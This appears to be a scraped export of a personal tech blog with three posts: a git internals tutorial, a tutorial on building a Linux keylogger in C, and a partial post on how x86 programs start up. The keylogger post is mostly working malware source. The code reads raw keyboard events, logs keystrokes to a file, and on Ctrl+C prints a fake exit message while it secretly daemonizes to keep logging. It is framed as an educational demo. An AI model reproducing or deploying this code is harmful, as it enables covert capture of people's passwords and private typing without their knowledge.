All your configuration files, repo description, commit histories, information about branches, and other git related things are present here in this directory.\nYou can think of git as a filesystem. You add, delete, modify, tag, etc..to this filesystem and there are mainly 4 types of objects involved in the whole process - blob, tree, commit, annotated tags. (Read more about git objects)\nThis gives us idea that we need to monitor .git repository for changes after we run each command and understand the relation between those.\nAfter git init this is the state of my repository. This is the initial state. So git init basically creates an initial state of this repository in the working area.\nAs it can be seen there are multiple hooks setting.. But they are just samples as of now. We can create our own hooks as per the need. These are simple scripts used to perform some automated tasks on some specific actions. (Read more about hooks)\nMost important thing is the HEAD. This is a file which is like a pointer to the commit we are pointing. Mostly all the changes we make are made using HEAD somehow.\nHEAD points to master for now. We\u0026rsquo;ll look how this file changes it\u0026rsquo;s data with different commands we enter.\nLet\u0026rsquo;s add a file and look for changes in the .git folder for each step.\nLooks like there are no changes for simply creating a file and adding some data to it. But things change as soon as I git add . it. So git starts monitoring the changes as soon as I add the files using git add command.\nOn investigating it further, we can understand that git add has created a blob object under ./.git/objects/ folder. And the file is zlib compressed data\u0026hellip; so we can uncompress it and look at the content of that file easily using zlib-flate -uncompress command.\nOn adding a new content to the same file newfile.txt, git created a new blob object. Apparently, git does not store the diffs of the file, instead they store the complete object. So if you have 3 files with a single line of change in each of them, then git is going to store 3 different blobs, instead of storing a diff of the files.\nYou can also notice that here as the previous data is not yet gone from the git repository. We have both of our changes - old and new.\nLet\u0026rsquo;s switch back again to the first data we have entered in the file.\nThis time they have not created any new object.. This means they create a new blob object whenever there is a new data.. and use the previous blob object whenever possible.\nNow let\u0026rsquo;s see what changes do we get on commiting these blob objects.\nOn commiting there are 2 more objects and some logs. Let\u0026rsquo;s inspect each one to see if we can get anything out of it.\nOne of the object is tree object and another one is the commit object. Commit object has all the information about the blob we added and the commit message along with few other details.\nThe other 2 logs which were generated are as above. By looking at these we can get that they both point to the commit object for now.\nAnd if we look at the .git/HEAD file, it still points to this reference - ref: refs/heads/master. Further looking in .git/refs/heads/master file, we get that this points to the commit object we created.\nIf we are to visualize the current situation it\u0026rsquo;ll be something like this.\nHEAD +---------+ | | | | | | v master +----------+ | | | v +---------+--------+ | | | ed6108f | | | +------------------+ Let\u0026rsquo;s add more commits to it now.\nWe now have 2 new objects for 2 new files.\nBut if we add another file with the same content in it (In other words, if use the repeatative data) then, git will not create new blob objects for it. It\u0026rsquo;ll use the previous blob object to track it.\nThis means that git only tracks the data in the file along with the file name\u0026hellip; instead of directly tracking the files.\nLet\u0026rsquo;s check the logs now.\nAnd we can get the same data from the .git/logs/HEAD file.\nAgain checking on the .git/HEAD\nVisual diagram for the above will look something like this.\nHEAD +---------+ | | | | | | v master +----------+ | | | v +------------------+ +--------+-------+ | | | | | 20998091 +\u0026lt;-------------+ ed6108f | | | | | +------------------+ +----------------+ You can also check this from the screenshot below.\nLet\u0026rsquo;s go branching now. You can create a new branch using git checkout -b feature. This command will create a branch for you. We can also observe that there are 2 new files.. 1 in the logs and another one in the refs/heads.\nLet\u0026rsquo;s see what\u0026rsquo;s there in these files.\nWe can observe 2 interesting things here:\nfeature and master branch point to the same commit at the moment. .git/HEAD (HEAD) points to the feature branch. This means whatever changes we will make it\u0026rsquo;ll be made on the feature branch. master +----------+ | | | v +------------------+ +--------+-------+ | | | | | 20998091 +\u0026lt;-------------+ ed6108f | | | | | +------------------+ +----------------+ HEAD ^ | | | | | | | | +---------\u0026gt; feature +-----------+ Let\u0026rsquo;s add new commits and see if we can see what we just concluded.\nmaster +--------+ | | | v +----------------+ +-------+----------+ +----------------+ | | | | | | | 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | | | | | | | +----------------+ +------------------+ +---------+------+ HEAD ^ | | | | | | | | +---------\u0026gt; feature +-----------+ At this point, the master is direct parent to the feature branch. So if we just merge feature to master then it\u0026rsquo;ll simply move the label one commit ahead. There is no need for a new commit to add both the changes.\nFor this, we need to change back to the master branch. Behind the scenes, this will simply change the .git/HEAD reference to master from feature.\nAnd visually, it\u0026rsquo;ll look something like this.\nHEAD +---------+ | | | | | | v master +--------+ | | | v +----------------+ +-------+----------+ +----------------+ | | | | | | | 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | | | | | | | +----------------+ +------------------+ +---------+------+ ^ | | | | feature +-----------+ We can see that there are some changes in the feature branch that master branch does not have yet. We can merge feature branch to master branch to get these features in the master.\nTo merge, we need to switch to master branch, and then simply merge it.\nThis type of merge is called fast-forward merge (as given in the output). This is simply moving forward and shifting the label (master) to point to appropriate commit.\nHEAD +---------+ | | | | | | v master +--------+ | | | v +----------------+ +-------+----------+ +----------------+ | | | | | | | 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | | | | | | | +----------------+ +------------------+ +---------+------+ ^ | | | | feature +-----------+ Let\u0026rsquo;s make more changes to feature and master both. And then merge them.\nLooking the logs in feature branch, we get -\nAnd for master branch -\nWe can clearly see that both have all the commits same except the latest one. And since both the branches had their different log files they have separate logs. But we can use a pretty handy command to check both the logs combined and a graphical representation (sort of) for both.\ngit log --graph --decorate --all\nSince I am in my main branch right now, so the HEAD points to master.\nThis situation will look something like this diagram below.\nHEAD +---------+ | | v master +--------+ | | v +-------+-------+ +----------------+ +------------------+ +----------------+ | | | | | | | | | 633145f +\u0026lt;--+--+ 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | | | | | | | | | | +---------------+ | +----------------+ +------------------+ +----------------+ | | | | +----------------+ | | | | | 68d38e06 +\u0026lt;--+ | | +-------+--------+ ^ | | feature +-----------+ let\u0026rsquo;s see what happens when we merge these 2 branches now.\nThis time it creates a new commit to merge both the branches and moves label master ahead to that commit, along with the HEAD.\nHEAD +---------+ | | v master +--+ | | | v +-------+---------+ +---------------+ +----------------+ +------------------+ +----------------+ | | | | | | | | | | | 76b2abc +\u0026lt;--------+ 633145f +\u0026lt;--+--+ 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | | | | | | | | | | | | +-------+---------+ +---------------+ | +----------------+ +------------------+ +----------------+ ^ | | | | | | | | +----------------+ | | | | | +------------------+ 68d38e06 +\u0026lt;--+ | | +--------+-------+ ^ | | feature +-----------+ In this merge, master calculated that it is not in the same hierarchy as feature. So it created a new object, merged the data from the feature and commited it as any other object.\nAfter merging, master and head labels will move forward to the latest commit. But the feature will be the same as before\u0026hellip; as we have not changed anything in that yet.\nWhat if that this new commit 76b2abc was a mistake and we want our master and HEAD labels back to commit 633145f?\nWe can simply reset the commits by git reset 633145 command. This will move my labels back to this commit mentioned.\nInterestingly enough, this will not remove the commit 76b2abc from the .git/objects/ directory. It\u0026rsquo;ll simply write a new log in the logs file and git log --graph --decorate --all command will give you a good output back.\nWhat if we want to test the new feature with all the current updates of master?\nFor this, we need to go to feature branch and merge master to it using git merge master\n(I had to remove newfile7.txt from master branch in order to switch the branch as there were few changes untracked. There are other ways around this as well, but to keep things simple I just deleted it)\nThis is again recursive strategy merge.\nmaster +--+ | | | v +--------+------+ +----------------+ +------------------+ +----------------+ | | | | | | | | +-------------------+ 633145f +\u0026lt;--+--+ 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | | | | | | | | | | | | +---------------+ | +----------------+ +------------------+ +----------------+ | | | | | | | | +--------v--------+ +----------------+ | | | | | | | 88dd609c +\u0026lt;--------+ 68d38e06 +\u0026lt;--+ | | | | +--------+--------+ +----------------+ ^ | | +-----\u0026gt; feature +------+ | | HEAD+ This way there was no change made in the master and a new feature was added and can be tested properly. You can call this feature integration test. If the feature passes the tests and we decide to update master with this feature, we can simply switch to master branch and merge feature to it.\nAfter checking out to master using git checkout master command, HEAD points to master like in the screenshot below.\nOn merging, we get a fast-forward merge since the master is direct parent of the commit which is to be merged and there was no need of a new commit to be created.\nAfter merge, master, HEAD, and feature point to the same commit.\n+---------------+ +----------------+ +------------------+ +----------------+ | | | | | | | | +------------+ 633145f +\u0026lt;--+--+ 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | +-----\u0026gt; master +--+ | | | | | | | | | | | | | +---------------+ | +----------------+ +------------------+ +----------------+ | | | | HEAD+ | | | v | | +--+------------v-+ | | | +----------------+ | | | | | | | 88dd609c +\u0026lt;--------+ 68d38e06 +\u0026lt;--+ | | | | +--------+--------+ +----------------+ ^ | | feature +------+ Collaborating with git Usually we don\u0026rsquo;t use git standalone in our machine. What I mean is, we do use git locally most of the time but at some point we need to share our commits to someone else via network.\nTo cover up the whole picture in a line \u0026ndash;\u0026gt;\nTo **get commits** from someone else we need to do `git pull`... and to **send our commits** out on the internet we need to `git push`. I am going the way we usually go and do things - \u0026ldquo;start with cloning a repo\u0026rdquo;. After cloning a repo I have got this.\nLet\u0026rsquo;s inspect it.\nThis time there are no obects like the last time. But we have new kinds of files - pack and idx. Git creates pack file(s) by reading a list of git objects and then convert this pack file to idx (index) file. This can be used by git to know the information about the git objects used to create pack file. But this is not important at the point.\nThe point I wanted to get started with is remotes. There is a new reference in .git/refs/ directory that points to something called remotes/origin/HEAD.\nSo what the heck is origin anyway? Why should I care?\nIf you go out and check the .git/config file\u0026hellip;you will know what origin means.\nHere origin is just a name that points to the github repo from which I cloned my current repository. So yeah, you should care about it if you have any intensions to push/pull to this remote repository anytime in future.\nAny branch with syntax like refs/remotes/*/* is called remote tracking branch. As the name suggests, it helps in tracking the remote status. It always show the remote status according to the last time both were synced together..and then they stay where ever they are until they are synced again.\nSo from all this, we can see that there is no exact need for origin or simply remote to be on the internet or in the network all the time. They both just need to be in contact whenever these needs to be synced. After that\u0026rsquo;s the whole point of being a distributed system.\nWhat we need is a remote repository..that can give us the pack files\u0026hellip;and other objects\u0026hellip; and then a working directory that we can use to add our changes and maybe another working directory that someone else is using to make his changes.\nWorkflow I am going to use now is as follows:-\nstart project + | v add new file +------------+ +-----------+ | | v v make a feature fix some old bugs + + | | | | | | | | v | | integrate and test new feature \u0026lt;------+ + | | | | | | +---------\u0026gt; (Push now) After integrating master to our feature we have:-\na feature branch with new feature and base from master. and master which is not changed. So if we want we can always use the previous stable version master or the bleeding edge feature.\nNow time to push it\u0026hellip; But instead of actually pushing it, I\u0026rsquo;ll make a local bare clone that is exactly same as the repo handled by github or similar after you make a push.\nTo make a bare clone of the repo you can use --bare option and rest is same.\nCommand:- git clone --bare mywork remote_repo\nNow I have 2 repos\u0026hellip; And the remote_repo has the content of .git folder\u0026hellip; It does not have any tracking branches this time. Well, we don\u0026rsquo;t need tracking branches in this repo. Do we?\nAlso I can see that all the commits I made are present there in the remote_repo.\nLet\u0026rsquo;s say now someone clones this repo\u0026hellip;\nHe also gets all the commits from the remote repo\nWith my remote_repo as the origin.\nBecause origin can be any bare repository.\nAfter someone has added their own branch and commited that change to his repo. Now he is ready to push/share the changes to/with origin.\nHe can share the data simply using the push command.\nNow our origin has got that new branch. So I had made changes to master branch it would have reflected in the master branch of the origin.\nAfter running below commands, someone can switch to his master branch and merge his user_feature branch.\ngit checkout master git merge user_feature master has now got all the new commits. Time to push/share master to our origin.\nAfter pushing changes to origin all the commits made to master are shared with origin/master and now both of them point to a single commit.\nI can also pull the changes from remote_repo to mywork\u0026hellip; the only thing I have to do is set a remote that points to the repo I want to pull data from.\nOr for now I can simply specify from where to pull and merge where.\ngit pull ./../remote_repo/ master This will give me the latest commits made by someone and pushed to remote.\nConclusion This is how a typical git flow works. There are obviously other git flows better and complex than this but knowing this flow gives you a basic idea of how to make your way around git and use it effectively to manage your project.\nWhere to go from here?? You should start playing on your own exploring more commands and looking up their help pages for descriptions and other information. I\u0026rsquo;ll recommend to read the Pro Git Book to understand other concepts as well. It is available for free.\n","permalink":"https://ayedaemon.github.io/post/2021/02/git-form-inside-out/","summary":"\u003cblockquote\u003e\n\u003cp\u003eInside out approach to learn git\u003c/p\u003e\n\u003c/blockquote\u003e","title":"Git Form Inside Out"},{"content":" Developing a low level keylogger for linux using C.\nI am putting this blog in a bottom-up approach. We\u0026rsquo;ll start with the basic program that can act as a keylogger.\nWhat is a Keylogger?? How to make one? Keylogger is a program (or a hardware sometimes) that logs all the keystrokes made by the keyboard.\nWe know that there is something in OS that listens to the keyboard events and perform actions accordingly. For example, when we press alt+tab it changes the current focus to another application/screen.\nAccording to wikipedia, in linux, the event devices generalizes all the raw input from device drivers and makes them available through character devices in /dev/input/ directory.\n(If you don\u0026rsquo;t know about character devices, think it as a real-time stream data)\nAll the event files/devices are located in /dev/input/ directory. It was very easy to figure out the file after looking at the directory structure.\nIt is pretty obvious that my keyboard event file is /dev/input/by-path/platform-i8042-serio-0-event-kbd. (For you, this may change, but it\u0026rsquo;ll have kbd in it\u0026rsquo;s name!!)\nSo I wrote a program that will continuously read data from this file and print it on screen.\nCODE - basic_keylogger.c\n#include \u0026lt;errno.h\u0026gt; #include \u0026lt;fcntl.h\u0026gt; #include \u0026lt;linux/input.h\u0026gt; #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; int main(void) { errno = 0; struct input_event ev; //This is the keyboard event file char* kbd_path = \u0026#34;/dev/input/by-path/platform-i8042-serio-0-event-kbd\u0026#34;; int fd = open(kbd_path, O_RDONLY); if(fd == -1) { printf(\u0026#34;Error %d\\n\u0026#34;, errno); exit(EXIT_FAILURE); } while (1) { read(fd, \u0026amp;ev, sizeof(struct input_event)); //read from keyboard printf(\u0026#34;%i - %i\\n\u0026#34;,ev.code, ev.value); } return 0; } Compile this and run it.\n## Compile gcc basic_keylogger.c -o basic_keylogger.out ## Execute it ./basic_keylogger.out This will give output something like this.\nI am not sure about what this all is. But I saw some pattern and decided to learn more on this later. The pattern here is, whenever ev.value is 1 then I am getting a ev.code unique for each key. So I decided to just filter out the data with ev.value == 1.\nCODE - basic_keylogger.c (minor modification)\n#include \u0026lt;errno.h\u0026gt; #include \u0026lt;fcntl.h\u0026gt; #include \u0026lt;linux/input.h\u0026gt; #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; int main(void) { errno = 0; struct input_event ev; //This is the keyboard event file char* kbd_path = \u0026#34;/dev/input/by-path/platform-i8042-serio-0-event-kbd\u0026#34;; int fd = open(kbd_path, O_RDONLY); if(fd == -1) { printf(\u0026#34;Error %d\\n\u0026#34;, errno); exit(EXIT_FAILURE); } while (1) { read(fd, \u0026amp;ev, sizeof(struct input_event)); //read from keyboard if(ev.value == 1) { printf(\u0026#34;%i - %i\\n\u0026#34;,ev.code, ev.value); } } return 0; } After again compiling and running this, I was just getting the useful data from everything.\nThis is the simple idea of making the keylogger. But there are a lot of things we haven\u0026rsquo;t done.\nMaking our keylogger more dynamic. Till now, we are using hard coded file name for the keyboard. We can make it more dynamic by searching for the kbd file in /dev/input/by-path/ and then read that file for the events. And then save the events in a file.\nFor this purpose, I have changed the working directory structure to make the project more modular.\nCODE:- basic_keylogger.c\n#include \u0026#34;basic_keylogger.h\u0026#34; int main(void) { errno = 0; struct input_event ev; char* kbd = get_me_a_keyboard(); // Get keyboard name char* kbd_path = concat(INPUT_EVENT_DIR, kbd); // Get complete path for keyboard int fd = open(kbd_path, O_RDONLY); if(fd == -1) { printf(\u0026#34;Error %d\\n\u0026#34;, errno); exit(EXIT_FAILURE); } printf(\u0026#34;Reading from %s\\n\u0026#34;,kbd_path); free(kbd_path); // free some memory while (1) { read(fd, \u0026amp;ev, sizeof(struct input_event)); //read from keyboard if(ev.type == 1) log_in_file(ev); //log the event } return 0; } This main program includes basic_keylogger.h file - which I have used to include all the libraries and define macros.\nCODE:- basic_keylogger.h\n/* // // defining variables // */ #define INPUT_EVENT_DIR \u0026#34;/dev/input/by-path/\u0026#34; #define LOG_FILE \u0026#34;/tmp/keylog.txt\u0026#34; /* // // importing system headers // */ #include \u0026lt;dirent.h\u0026gt; #include \u0026lt;errno.h\u0026gt; #include \u0026lt;fcntl.h\u0026gt; #include \u0026lt;linux/input.h\u0026gt; #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026lt;sys/stat.h\u0026gt; #include \u0026lt;sys/types.h\u0026gt; #include \u0026lt;time.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; /* // // importing utility functions // */ #include \u0026#34;utils/logger.c\u0026#34; #include \u0026#34;utils/helpers.c\u0026#34; #include \u0026#34;utils/keyboard.c\u0026#34; Here are 3 more files included for obvious purposes.\nCODE:- utils/logger.c (logger function)\nvoid log_in_file(struct input_event ev) { printf(\u0026#34;Logging\u0026#34;); time_t t = time(NULL); struct tm tm = *localtime(\u0026amp;t); FILE* fptr = fopen(LOG_FILE, \u0026#34;a\u0026#34;); // print( [date time] keycode keyvalue ) - keyvalue =\u0026gt; {press; lift; long press} fprintf(fptr, \u0026#34;[ %d-%02d-%02d %02d:%02d:%02d ] key %i state %i\\n\u0026#34;, tm.tm_year + 1900, tm.tm_mon + 1, tm.tm_mday, tm.tm_hour, tm.tm_min, tm.tm_sec, ev.code, ev.value); if(tm.tm_sec == 0) { /* Do whatever you want to do here It is like a scheduler section.*/ //fprintf(fptr, \u0026#34;%s\\n\u0026#34;, \u0026#34;1 minute check\\n\u0026#34;); } fclose(fptr); printf(\u0026#34; logged\\n\u0026#34;); } CODE:- utils/helpers.c (now only used for concatination of 2 strings)\nchar* concat(const char *s1, const char *s2) { const size_t len1 = strlen(s1); const size_t len2 = strlen(s2); char *result = malloc(len1 + len2 + 1); // +1 for the null-terminator // in real code you would check for errors in malloc here memcpy(result, s1, len1); memcpy(result + len1, s2, len2 + 1); // +1 to copy the null-terminator return result; } CODE:- utils/keyboard.c (get keyboard device from the directory)\nchar* get_me_a_keyboard() { struct dirent **namelist; int n=0,i=0; n = scandir(INPUT_EVENT_DIR, \u0026amp;namelist, NULL, alphasort); // read the directory for the files if(n==-1) { // perror(\u0026#34;Scandir Failed!!\\n\u0026#34;); exit(EXIT_FAILURE); } if(n\u0026lt;=2){ // perror(\u0026#34;No devices found!!\\n\u0026#34;); exit(EXIT_FAILURE); } // printf(\u0026#34;[ * ] %d Devices found !!\\n\u0026#34;,n-2); for(i=0; i\u0026lt;n; i++) if( namelist[i]-\u0026gt;d_name == \u0026#34;.\u0026#34; || namelist[i]-\u0026gt;d_name == \u0026#34;..\u0026#34;) // skip for . and .. continue; else if(strstr(namelist[i]-\u0026gt;d_name,\u0026#34;kbd\u0026#34;)) // check if the filename has \u0026#34;kbd\u0026#34; (keyboard) in it break; // if yes, do not look further return namelist[i]-\u0026gt;d_name; // and return keyboard file name to caller function } After compiling and executing the binary. We get logging - logged message on the terminal and the actual log is being stored in /tmp/keylog.txt file - as mentioned in basic_keylogger.h file.\nWhat next? \u0026hellip;Getting evil!! We can close the program by pressing ctrl+c or send it to background by ctrl+z. These key combinations send a signal to the process to close. And we can handle these signals in our code\u0026hellip;. using signal.h header file. (import this in the code.)\nCODE - basic_keylogger.c (added signal handlers)\n#include \u0026#34;basic_keylogger.h\u0026#34; // Signal handler function void signal_handler(int sig) { printf(\u0026#34;Sorry, But I won\u0026#39;t exit.\\n\u0026#34;); } int main(void) { errno = 0; struct sigaction signal; // create signal action struct signal.sa_handler = signal_handler; // initialize the handler function sigaction(SIGINT, \u0026amp;signal, NULL); // assign the signal action to a specific signal struct input_event ev; char* kbd = get_me_a_keyboard(); // Get keyboard name char* kbd_path = concat(INPUT_EVENT_DIR, kbd); // Get complete path for keyboard int fd = open(kbd_path, O_RDONLY); if(fd == -1) { printf(\u0026#34;Error %d\\n\u0026#34;, errno); exit(EXIT_FAILURE); } printf(\u0026#34;Reading from %s\\n\u0026#34;,kbd_path); free(kbd_path); // free some memory while (1) { read(fd, \u0026amp;ev, sizeof(struct input_event)); //read from keyboard if(ev.type == 1) log_in_file(ev); //log the event } return 0; } As expected with this code, I am unable to close the program with ctrl+c. Whenever I am pressing it, it gives me a message that \u0026ldquo;Sorry, But I won\u0026rsquo;t exit.\u0026rdquo;\nThis program can only be terminated with kill signal. See here to know how.\nGoing undercover What if we trick user with a false closing message and go undercover (Daemon process).\nThe idea is to create the process as a daemon process whenever the user press ctrl+c. Also give the user a good message so that he actually believes that the process has closed and then probably he\u0026rsquo;ll not check for the running processes to find if it actually has closed.\nTo achieve this, I\u0026rsquo;ll make slight changes to my signal_handler function and add a daemonize function to create a daemon process. If you have already not seen what a daemon process is and how to create one - Look here.\nCODE:- basic_keylogger.c (changed the signal_handler function)\n#include \u0026#34;basic_keylogger.h\u0026#34; // Signal handler function void signal_handler(int sig) { printf(\u0026#34;Exiting very gracefully :)\u0026#34;); //fake message daemonize(); // Go undercover } int main(void) { errno = 0; struct sigaction signal; // create signal action struct signal.sa_handler = signal_handler; // initialize the handler function sigaction(SIGINT, \u0026amp;signal, NULL); // assign the signal action to a specific signal struct input_event ev; char* kbd = get_me_a_keyboard(); // Get keyboard name char* kbd_path = concat(INPUT_EVENT_DIR, kbd); // Get complete path for keyboard int fd = open(kbd_path, O_RDONLY); if(fd == -1) { printf(\u0026#34;Error %d\\n\u0026#34;, errno); exit(EXIT_FAILURE); } printf(\u0026#34;Reading from %s\\n\u0026#34;,kbd_path); free(kbd_path); // free some memory while (1) { read(fd, \u0026amp;ev, sizeof(struct input_event)); //read from keyboard if(ev.type == 1) log_in_file(ev); //log the event } return 0; } Here, I am using daemonize funtion which is defined in ./utils/daemonize.c and imported in basic_keylogger.h.\nCODE:- daemonize.c\nint daemonize() { pid_t pid, sid; /* Fork off the parent process */ pid = fork(); if (pid \u0026lt; 0) { exit(EXIT_FAILURE); } /* If we got a good PID, then we can exit the parent process. */ if (pid \u0026gt; 0) { // Child can continue to run even after the parent has finished executing exit(EXIT_SUCCESS); } /* Change the file mode mask */ umask(0); /* Open any logs here */ /* Create a new SID for the child process */ sid = setsid(); if (sid \u0026lt; 0) { /* Log the failure */ exit(EXIT_FAILURE); } /* Change the current working directory */ if ((chdir(\u0026#34;/\u0026#34;)) \u0026lt; 0) { /* Log the failure */ exit(EXIT_FAILURE); } /* Close out the standard file descriptors */ //Because daemons generally dont interact directly with user so there is no need of keeping these open close(STDIN_FILENO); close(STDOUT_FILENO); close(STDERR_FILENO); return(pid); } After compiling and executing this code. We get a decent exit message like this.\nBut we can check from the /tmp/keylog.txt file that the program is still adding key events to the file. Use tail -f /tmp/keylog.txt command to check appending logs.\nYou can look for the process using ps -A | grep 'your_binary_name' command to get the process ID of the daemon keylogger running behind the scene. And then kill it by using kill -9 \u0026lt;processID\u0026gt;.\nConclusion. You can take this blog as an educational purpose demo that even the least suspecting program from any untrusted source can be malicious and can do a lot of things you have not expected it to do. We can create simple programs, that can read the whole file system to know what programs you use.. get the files with sensitive information.. passwords stored in the browsers.. setup a trojan.. and what not. Also with small modifications, I can send all the logs created locally to a remote server.\nThis program is only tested in a bare-metal linux system. This can\u0026rsquo;t work on windows (because they have different system calls and API to work) and this is also not working in VM for some reason which I am trying to figure out why. If you have any knowledge regarding this, please feel free to reach out and help me to understand the problem.\nAll this code is present in github repo here -\u0026gt; (https://github.com/ayedaemon/C-practice/tree/master/lin-c/keylogger)\n","permalink":"https://ayedaemon.github.io/post/2021/02/keylogger-for-linux/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDeveloping a low level keylogger for linux using C.\u003c/p\u003e\n\u003c/blockquote\u003e","title":"Keylogger for Linux"},{"content":" How your x86 program starts up in linux\nIn this blog, I will assume that you have basic understanding of assembly language. If not, then you should consider learning it. Although I\u0026rsquo;ll try to explain things in the easiest terms as possible.\nBasic C program Let\u0026rsquo;s start with a basic C program\u0026hellip;\nCODE: (Saving it with simple.c)\n#include \u0026lt;stdio.h\u0026gt; int main() { printf(\u0026#34;Hello main\u0026#34;); return 0; } \u0026hellip; and compile it the way we have always done it with gcc.\ngcc simple.c -o simple.out Now I have got a file simple.out which should be my executable binary.. I have a habit to check the file using file command to be more sure.\n$ file simple.out simple.out: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=11c9b757baf9a3a8271443682135b7488cb04e52, for GNU/Linux 3.2.0, not stripped And now we know that it is an ELF binary and dynamically linked.\nLet\u0026rsquo;s see what shared objects they use.\n$ ldd simple.out linux-vdso.so.1 (0x00007fffbc364000) libc.so.6 =\u0026gt; /usr/lib/libc.so.6 (0x00007f5b0d6a7000) /lib64/ld-linux-x86-64.so.2 =\u0026gt; /usr/lib64/ld-linux-x86-64.so.2 (0x00007f5b0d8b9000) The interesting one here is libc.so.6 =\u0026gt; /usr/lib/libc.so.6 (0x00007f5b0d6a7000). This shared object is used in almost every linux command you know. On checking the man page for libc.. I came to know that it is the standard C library used in linux.\nThe question I am asking myself here is \u0026ndash;\u0026gt; Is this somehow responsible to execute the main() function in C programs.\nMaybe. We\u0026rsquo;ll see that later.\nLet\u0026rsquo;s decompile our simple binary. I can check the assembly code of the executable using objdump -d simple.out command on my terminal. It\u0026rsquo;ll give me a lot of output but right now I am concerned about the main() function\u0026hellip; so I\u0026rsquo;ll just grep it.\n$ objdump -d simple.out | grep -A12 \u0026#39;\u0026lt;main\u0026gt;:\u0026#39; 0000000000001139 \u0026lt;main\u0026gt;: 1139:\t55 push %rbp 113a:\t48 89 e5 mov %rsp,%rbp 113d:\t48 8d 3d c0 0e 00 00 lea 0xec0(%rip),%rdi # 2004 \u0026lt;_IO_stdin_used+0x4\u0026gt; 1144:\tb8 00 00 00 00 mov $0x0,%eax 1149:\te8 e2 fe ff ff callq 1030 \u0026lt;printf@plt\u0026gt; 114e:\tb8 00 00 00 00 mov $0x0,%eax 1153:\t5d pop %rbp 1154:\tc3 retq 1155:\t66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 115c:\t00 00 00 115f:\t90 nop If you don\u0026rsquo;t understand assembly, I get what you are feeling right now\nBut you don\u0026rsquo;t need to understand it completely right now. You can look into some syntax and they\u0026rsquo;ll make sense in some time. Like callq 1030 \u0026lt;printf@plt\u0026gt; - this looks like out printf() function. And we know before calling a function, you need to pass its arguments on the stack. That means the mov just above the callq statement is my string Hello main (which is the argument passed to printf())\nAnother Question \u0026ndash;\u0026gt; Is main() really the starting point of execution??\nOn further looking into the objdump -d simple.out command output\u0026hellip; I can understand that there is another function_start that calls the main() function.\nDisassembly of section .text: 0000000000001040 \u0026lt;_start\u0026gt;: 1040:\tf3 0f 1e fa endbr64 1044:\t31 ed xor %ebp,%ebp 1046:\t49 89 d1 mov %rdx,%r9 1049:\t5e pop %rsi 104a:\t48 89 e2 mov %rsp,%rdx 104d:\t48 83 e4 f0 and $0xfffffffffffffff0,%rsp 1051:\t50 push %rax 1052:\t54 push %rsp 1053:\t4c 8d 05 76 01 00 00 lea 0x176(%rip),%r8 # 11d0 \u0026lt;__libc_csu_fini\u0026gt; 105a:\t48 8d 0d ff 00 00 00 lea 0xff(%rip),%rcx # 1160 \u0026lt;__libc_csu_init\u0026gt; 1061:\t48 8d 3d d1 00 00 00 lea 0xd1(%rip),%rdi # 1139 \u0026lt;main\u0026gt; 1068:\tff 15 72 2f 00 00 callq *0x2f72(%rip) # 3fe0 \u0026lt;__libc_start_main@GLIBC_2.2.5\u0026gt; 106e:\tf4 hlt 106f:\t90 nop It does not call the main() directly.. But it takes main() as an argument and then calls __libc_start_main (from GlibC). Along with main(), it also takes __libc_csu_fini and __libc_csu_init as an argument.\nThe whole picture This image is taken from here\u0026hellip; This is a complete in-depth blog explaining How the heck do we get to main()?\nNow from the picture, it is very much clear that _start passes main (and other 2 functions) to __libc_start_main(function name was not sure from the disassembly). And __libc_start_main starts the main().\nBut what the hell is everything else??\nTo start with, Loader is a program that loads executable from disk to RAM (primary memory) for execution. In unix, it is the handler for execve() system call. As per the wikipedia page for loader(computing), It\u0026rsquo;s tasks include:\nvalidation (permissions, memory requirements etc.); copying the program image from the disk into main memory; copying the command-line arguments on the stack; initializing registers (e.g., the stack pointer); jumping to the program entry point (_start). But before getting to _start, it pre-initializes some global variables to help _start. You can create your custom preinit function as well. For this, you\u0026rsquo;ll need the constructor function. And yes, it is not C++ and it has a constructor and destructor. Every executable has a global C level constructor and destructor.\nThis is a code (unknown_functions.c) to change the preinit function with my own. I have added 3 printf() statements to preinit() (which should be easy to figure out in assembly now).. I\u0026rsquo;ll compile this code using gcc unknown_functions.c -o unknown_functions.out.\n#include \u0026lt;stdio.h\u0026gt; void preinit(int argc, char **argv, char **envp) { printf(\u0026#34;%s\\n\u0026#34;, __FUNCTION__); printf(\u0026#34;%d , %s , %s\\n\u0026#34;, argc, *argv, *envp); printf(\u0026#34;CLI arg : %s\\n\u0026#34;, argv[1]); } __attribute__((section(\u0026#34;.preinit_array\u0026#34;))) typeof(preinit) *__preinit = preinit; int main(int argc, char **argv, char **envp) { printf(\u0026#34;This is %s\\n\u0026#34;,__FUNCTION__); printf(\u0026#34;%d , %s , %s\\n\u0026#34;, argc, *argv, *envp); printf(\u0026#34;CLI arg : %s\\n\u0026#34;, argv[1]); return 0; } On running it with ./unknown_functions.out, I get some expected output.\npreinit 1 , ./unknown_functions.out , ALACRITTY_LOG=/tmp/Alacritty-161582.log CLI arg : (null) This is main 1 , ./unknown_functions.out , ALACRITTY_LOG=/tmp/Alacritty-161582.log CLI arg : (null) And we can also pass CLI argument to the binary like ./unknown_functions.out abcd1 and then it\u0026rsquo;ll give an output like this-\npreinit 2 , ./unknown_functions.out , ALACRITTY_LOG=/tmp/Alacritty-161582.log CLI arg : abcd1 This is main 2 , ./unknown_functions.out , ALACRITTY_LOG=/tmp/Alacritty-161582.log CLI arg : abcd1 With this, we know that preinit function runs before main(). Let\u0026rsquo;s move forward with 